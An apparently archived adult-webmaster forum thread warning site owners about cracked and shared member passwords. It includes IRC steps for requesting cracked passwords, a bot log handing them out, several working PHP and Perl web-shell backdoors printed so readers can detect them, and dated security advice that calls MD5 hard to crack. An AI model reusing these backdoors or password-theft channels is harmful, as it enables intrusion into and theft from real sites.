How easy is it to get a password to just about any pornsite?

[High_Times]

How easy is it to get a password to just about any pornsite?

Very FUCKING easy!

In this thread I will attempt to get webmasters to actually do something about their BW and customer service costs.

I bet you webmasters don't even realize just how many passwords are given out in a day. If you did, I am sure you would do something about it. I hear it all the time, "We actually give out passwords to 'password boards' to have them fail in a few hours and try to get people to buy based on the 401 error page and popup consoles)." What you don't realize is that most people don't get passwords from fake password boards.

Surfers are not stupid anymore. First we will look at one of the oldest technologies, newsgroups. Go to your favorite reader and plug into alt.sex.passwords, a newsgroup that has been giving out passwords since before there was an internet (it used to give them out for subscription porn BBS's). Here you will see anywhere from 10's to 100's of passwords given out daily. Just request one and see how fast you get a reply.

Next we can go to the IRC. Another old technology. Get where we are going? You guess it (maybe), Alt.Sex.Passwords again ;) . This time we go to www.mirc.com and download the latest copy. Then load it up and login to thundercity.net. Perhaps the easiest way is this command:

/server irc.thundercity.net

Then /join #asp

Now you can make a request in this format,

!request http://members.url.com/members_area (billing_company)

Someone is going to crack you a password in 0 seconds to 1 hour or so. I said 0 seconds because someone might have cracked a ton of passwords for your site already. When someone does this, they usually setup a script to automatically fill your request.

Now you are thinking, "So fucking what, I have the most leet password management scripts known to man (or woman). They will block these fuckers!" Sorry, but no, they won't. Why not? Because AOL sucks balls, that is why! You had to set it do that 3 to 5 people can use a password with the same IP and the AOL modem/ADSL users can use your service without getting blocked. "Right." you say, "But these people are giving the same passwords to multiple people every few minutes, they WILL get blocked!" Wrong, I say... If you have two systems at your work space, ask for the same password from each different machine. Someone will crack you 2 different passwords... And the other 30 people? They will get 30 different passwords... It is actually "bad etiquette" for a cracker to give the same password to 2 people within 2 hours time.

Most people who sign on to the IRC don't use proxies. Infact, IRC networks try to make it really hard to do so. So you can watch someone get one of your passwords and then see what happens in your logs. Or better yet, watch for a 1 hour period. Say 20 people ask for your site in that time frame. Then also keep track of legit users in the same time frame. GREP your logs for their IP's and see how much BW they are using. Compare it to the BW the legit users are using. Is it 20%? 25%? 50%? more?

See how many passwords get blocked. Do any? If 5 do, then do the legit users cancel them or chargeback instead of getting them reactivated? Does the customer service agent make them feel like suspects (password sharing) instead of victims (password cracking)? Do they reset the password with the same password so this happens again?

OK.. now let's try a password forum.

http://www.xxxhq.com/vb/index.php

Here you will find passwords that people have cracked and posted. You can usually find working passwords for your favorite sites. The major problem with this method is that you are going to have upwards of a 100 people try a password at the same time. Killing it. It is common that if you post 200 passwords for a big site like [insert_your_idea_of_a_big_site_here], the passwords will die en'masse. Why is this a problem? Because it is a customer service nightmare when 200 passwords are killed in 2 hours. 1 to 5 chargebacks? 10 to 20 cancels? 5 to 30 refunds? I dunno. I don't run a program, but I am sure you see numbers somewhere near these. Resetting the remaining 150 passwords = fun? I didn't think so.

I didn't write this to give GFY surfers a free ride. I wrote it to let you know that you all have problems in some form... Well, 95% of you do. How can you fix this shit? First, use a form login. Crackers HATE form logins. Basic Authentication (the grey popup) can be cracked at speeds as high as 150,000 tries per hour. Forms are about 8,000 to 25,000. No one wants to do them.

But people WILL, IF THEY HAVE TO. So you need something even better. So you need a security code. Not a run-of-the-mill one either. The numbers and letters need to mix with their backgrounds so that there is little contrast. A program named Caecus can read the run-of-the-mill ones pretty easy, but it relies on contrast to do so. Skewing the numbers and letters also helps.

Now you have 1/2 of the battle won. Finding working passwords is a bitch for a cracker now. But what about the hacker? They are still getting in and getting passwords. To combat them you need to properly create and secure passwords.

#1, Make your own passwords. Do not let a user choose their password, ever. These passwords should be made out of both upper and lowercase letters and with numbers. They should be 8 characters in length.

#2, NEVER store unencrypted passwords on the server. NEVER EVER! If you generate your own passwords and a hacker steals the unencrypted ones, you are screwed.

#3, Store passwords in a bitchy format like MD5. MD5 passwords can be cracked at about 5,000 c/s and DES can be done at 150,000 c/s or more. Which one is the better choice?

Now assuming you followed rules 1, 2 and 3 you have the other 1/2 of the problem fixed. Now even if a hacker steals your DB, they have passwords that they cannot crack. But what if a customer forgets their password? Simple, write a script just like the one that resets your password here at GFY.

Still not thinking the problem is HUGE? ( -m allows you to connect to another server without disconnecting from the current one.)

/server -m mesra.kl.my.dal.net
/list xxx

then,

/server -m mesa.az.us.undernet.org
/list xxx

I could go one but I think you will quickly see just how much of a pain in the ass this kind of password cracking is.

This is also a call to programmers. If you can offer solutions like the login script or password reset scripts, reply here! Offer your services. I am sure there are about 3,000 websites that need them.

[TheDoc]

http://www.bettercgi.com/strongbox/

Problems solved..

[newbreed]

Quote:

Originally Posted by TheDoc

http://www.bettercgi.com/strongbox/

Problems solved..

No fucking doubt man.

[sonofsam]

High times can i buy your sig for 300/month ?

[newbreed]

Quote:

Originally Posted by sonofsam

High times can i buy your sig for 300/month ?

[High_Times]

Quote:

Originally Posted by TheDoc

http://www.bettercgi.com/strongbox/

Problems solved..

Nice solution. Got a site it is on so I can check it out?

[newbreed]

Quote:

Originally Posted by High_Times

Nice solution. Got a site it is on so I can check it out?

www.arikaames.com

[High_Times]

Quote:

Originally Posted by sonofsam

High times can i buy your sig for 300/month ?

Can you afford it?

[AlienQ - BANNED FOR LIFE]

For 6 psts he is really knockin out some great BS and Misinformation.

But hey it's always fun to forget everything ya know...
Lets enjoy the fantasy.

[newbreed]

Quote:

Originally Posted by AlienQ

For 6 psts he is really knockin out some great BS and Misinformation.

But hey it's always fun to forget everything ya know...
Lets enjoy the fantasy.

No doubt.

[sonofsam]

Quote:

Originally Posted by High_Times

Can you afford it?

no actually i can't i was gonna ask newbreed to pay the upfront cost, and then since your sig will get clicked so much that i'll split the proffit with him

[Jay_StandAhead]

pennywize has done wonders for us.

[High_Times]

Quote:

Originally Posted by newbreed

www.arikaames.com

Nice. The one flaw is that this is fixing the 1st half of the problem. The crackers. They cannot get in. You still need to work on the hackers. Also the site allows the users to generate their own passwords. If the website itself is ever hacked, then a hacker will have an easy time decrypting them.

[newbreed]

HT, go back to smoking herb, you appear to be better at that than posting here.

SOS, does he have a sig yet? If so, what an embarassing mistake by any company who would let him link up.

[sonofsam]

Quote:

Originally Posted by High_Times

Nice. The one flaw is that this is fixing the 1st half of the problem. The crackers. They cannot get in. You still need to work on the hackers. Also the site allows the users to generate their own passwords. If the website itself is ever hacked, then a hacker will have an easy time decrypting them.

thats a very good point... i think you should email the pentagon and let them know that if their site gets hacked they are vulnerable once the hackers are inside

[newbreed]

Quote:

Originally Posted by High_Times

Nice. The one flaw is that this is fixing the 1st half of the problem. The crackers. They cannot get in. You still need to work on the hackers. Also the site allows the users to generate their own passwords. If the website itself is ever hacked, then a hacker will have an easy time decrypting them.

The clueless ones are always the best!!!!!!!!

[AlienQ - BANNED FOR LIFE]

Anything can be cracked and hacked...
Big Whoooop

Tell us somthing new, are you waisting any talent you have just to get into a porn site?

Let us know when you can Crack IBILL to find out exactly whats going on.

[sonofsam]

did you know if hackers got into your server, that its bad?

[High_Times]

Now I know how Jesus felt...

Pretty much all who have posted are sheep. I think that is obvious.

If a hacker steals your DB and cannot use the DB then you have still won. If you are too thick to realize that then you are a sheep.

Example,

Code:

<coldrage> http://www.ravenriley.com/members/ sent to Dean
<AVSbot> adultcheck.com_gold sent to Pichou [#16288]
<coldrage> http://members.cohf.net/ageverif/cohfageverif.cgi sent to stanley334
<rAz0r> http://www.lfpcontent.com/hustler/ sent to nomit
<rAz0r> http://www.amkingdom.com/protected/mea1x.htm sent to Kihadissa
<AVSbot> ageticket sent to chaarlie [#16299]
<AVSbot> bondagepass.com sent to jkahr [#16300]
<coldrage> http://members.oxpassport.com/ sent to gapup
<coldrage> http://login.givemepink.com/ sent to dubc
<coldrage> http://login.spermswap.com/login.cgi sent to tomy
<coldrage> http://members.cohf.net/ageverif/cohfageverif.cgi sent to sprimal
<AVSbot> adultcheck.com_gold sent to FalconX [#16308]
<AVSbot> ageticket sent to GreyLizard [#16310]
<coldrage> http://login.allinternal.com/login.cgi sent to ChromoX

The lastest cracked passwords on ASP... Perfectgonzo creates the users password. They also use a kickass login script and password management script. But it is painfully obvious that it didn't even make a lick of difference. They stored the passwords unencrypted on their server and now the hackers give those out. They also backdoored the server with <? if(isset($cmd)) { passthru($cmd); } ?> scripts. So they can get todays updated working list.

You can call me scum, poser or whatever you'd like. The truth is I know more than you probably ever will and for some reason that scares you more than the knowledge you'd gain by listening.

[sonofsam]

good thing you posted a screenshot of peoples passwords being given out.... you know... because the reason you got flamed was because we didn't believe that passwords were being cracked



i should probably mention that i was being sarcastic

[stev0]

Wow, someone actually addresses a real issue on GFY and look at the responces...

That's just sad...

[AlienQ - BANNED FOR LIFE]

K...

Right about now I am waiting for the sales pitch...

Password problems have always been a problem since day one.
What your saying is really umm...

Nothing new...
So what are you selling?

[KMR Stitch]

Good post HT.

Fuck the haters

[High_Times]

I am not selling anything. Not a service. Not a device. Not a piece of software.

I am simply telling you the three things you need to be smarter and to STOP being cracked/hacked for passwords.

Form with security code.
Server made passwords (8 characters minimum).
Stored encrypted with MD5 or something else equally hard to crack.

[sonofsam]

Quote:

Originally Posted by High_Times

I am not selling anything. Not a service. Not a device. Not a piece of software.

I am simply telling you the three things you need to be smarter and to STOP being cracked/hacked for passwords.

Form with security code.
Server made passwords (8 characters minimum).
Stored encrypted with MD5 or something else equally hard to crack.

everyone i've talked to who has used strongbox doesn't have a problem with their passwords being distributed over irc / password forums / etc etc

[AlienQ - BANNED FOR LIFE]

PHHhhh...

THanks you waisted my time...

[AlienQ - BANNED FOR LIFE]

HightTimes I like ya already.

Ya got "That Aggression" turn it into cash

[Jace]

all my sites are protected strictly with iprotect, server made 10 character alpha numeric passwords and encrypted on a seperate server with MD5....

[High_Times]

Code:

grep -R -i passthru ./

Run this in the home directory of your websites.

Example,

/home/sites/website1.com
/home/sites/website2.com

Run it in /home/sites so that it covers them all... If you find a script that resembles the one I posted previously, you've been hacked.

[bigmack]

Quote:

Originally Posted by High_Times

Code:

grep -R -i passthru ./

Run this in the home directory of your websites.

Example,

/home/sites/website1.com
/home/sites/website2.com

Run it in /home/sites so that it covers them all... If you find a script that resembles the one I posted previously, you've been hacked.

Well I guess that was the silver nail that was drove home in the casket, no replies for a while now.

[High_Times]

Backdoor scripts,

Code:

<?php passthru(getenv("HTTP_ACCEPT_LANGUAGE"));?>

<?passthru(stripslashes("echo;".getenv("HTTP_ACCEPT_IP")));?>

<pre><? if ($f) { ?><form method=post><textarea name=f rows=3 cols=50><? echo $f?></textarea><input type=submit></form><? $e = "$f 2>&1"; $g= `$e`; echo "<pre>".$g."</pre>"; }?>

<?php passthru("echo;".getenv("HTTP_ACCEPT_IP"));?>

<pre><? if ($f) { ?><form method=post><textarea name=f rows=3 cols=50><? echo $f?></textarea><input type=submit></form><? $e = "$f 2>&1"; $g= `$e`; echo "<pre>".$g."</pre>"; }?>

CGI Version,

<PRE>#!/usr/bin/perl
use CGI qw(:standard);print header;$d = $ENV{"HTTP_ACCEPT_LANGUAGE"};{$l=`$d 2>&1`;print pre($l);};
</PRE>

[sonofsam]

High_times i'm just curious.. what paysite do you run ?

[High_Times]

netstat -a|grep LISTEN

Is someone running an IRC botnet on your BW and server? Running a backdoor to get on later?

[KMR Stitch]

grep ahh I remember cisco's protocals =)

[TheDoc]

HT... Most sites don't get hacked, sites like perfectgonzo didn't get hacked. The pw leaks are from brute force attacks. No protection software can stop the attacks 100%.

[High_Times]

Quote:

Originally Posted by sonofsam

High_times i'm just curious.. what paysite do you run ?

I will not get into what I do in the adult industry because I'm become an obvious target for hackers ;)

BTW, they really like the thread tracking services since they allow the hackers to stay up to date on what you are doing to stop them.

[High_Times]

Quote:

Originally Posted by TheDoc

HT... Most sites don't get hacked, sites like perfectgonzo didn't get hacked. The pw leaks are from brute force attacks. No protection software can stop the attacks 100%.

I know they did get hacked. I know how they got hacked. I won't spell it out here. You can easily find it by surfing the link to their join page. Dammit... well, I gave some of it away.

[High_Times]

Quote:

Originally Posted by KMR Stitch

grep ahh I remember cisco's protocals =)

Actually that is a UNIX shell command.

[sonofsam]

why are you more a target then anyone else?

[High_Times]

Quote:

Originally Posted by sonofsam

why are you more a target then anyone else?

Ask yourself why certain webmasters catch hackers red handed and then never turn them in? Why hasn't the LA Times printed a story about every single MPA2 customer getting hacked? Why not a story about add-passwd.cgi being hackable before the check for WNU.com's IP? Why not a story about CCBILL leaving the logs directory world readable by default?

Because no webmaster wants retrobution from hackers who read the story and then say, "Ohh, you thought that was cute? Wait until this..."

[sonofsam]

i may be wrong but i have a hard time believing that whatever it is you do that

posting your site on gfy = getting hacked

[High_Times]

Quote:

Originally Posted by sonofsam

i may be wrong but i have a hard time believing that whatever it is you do that

posting your site on gfy = getting hacked

The former...

[sonofsam]

Quote:

Originally Posted by High_Times

The former...

well i guess we'll never know since you wont say what site you own

[swedguy]

Hmmm, talk about easy.

[TheDoc]

The PW leaks are from Brute Force attacks and/or members giving up the information. I ran my sites, 2 dead, one trial members area.. They won't link to auth form sites.

I couldn't find any of the perfect gonzo sites that worked.

[High_Times]

Quote:

Originally Posted by JaceXXX

all my sites are protected strictly with iprotect, server made 10 character alpha numeric passwords and encrypted on a seperate server with MD5....

Not only are you protecting yourself, you are protecting the industry. You are also protecting yourself twice over.

If you run a single girl teen site and someone steals your unencrypted passwords (or encrypted ones with DES and customer made passwords) then you have just fucked over everyone else running a single girl site that is using Basic Authentication. It is highly likely that you share members either concurently or consecutively. Your 3,000 user passfile or 30,000 user log file is like a 150 user passfile or 1000 user passfile respectively to the other sites.

You protect yourself twice over because if hackers can't get anyones working passwords, they can't crack logins. If they can't crack logins then people will have no choice but to pay for porn.

Congrats, you just increased your income a small percentage. But it will take the entire industry to get on the same bandwagon for the percentage to really shoot up. The percentage of increased income is directly related to the percentage of same niche sites that protect themselves like you have.

[High_Times]

Quote:

Originally Posted by TheDoc

The PW leaks are from Brute Force attacks and/or members giving up the information. I ran my sites, 2 dead, one trial members area.. They won't link to auth form sites.

I couldn't find any of the perfect gonzo sites that worked.

Damn, BAB is a hot as all hell site!

[TheDoc]

Quote:

Originally Posted by High_Times

Damn, BAB is a hot as all hell site!

I can't find a working PW for the main site, only for the trial site.. Which is fine, surfers make us money.

[High_Times]

Quote:

Originally Posted by TheDoc

I can't find a working PW for the main site, only for the trial site.. Which is fine, surfers make us money.

Then you made my point. This message isn't for you or JaceXXX unless it is to appluad your attention to security.

This message is for the hundreds of other sites and sponsors who are not taking these matters seriously.

[High_Times]

http://trial.theinnerzone.com/upgrade.php

You get 2 buttons to upgrade with. I clicked BAB and got,

Upgrade Error!


Could not find your membership, please try again. The Email Address you entered might be different from one on the file.

If this problem persists, please contact BillingSupport.com from the following page: http://www.billingsupport.com/inquiry.html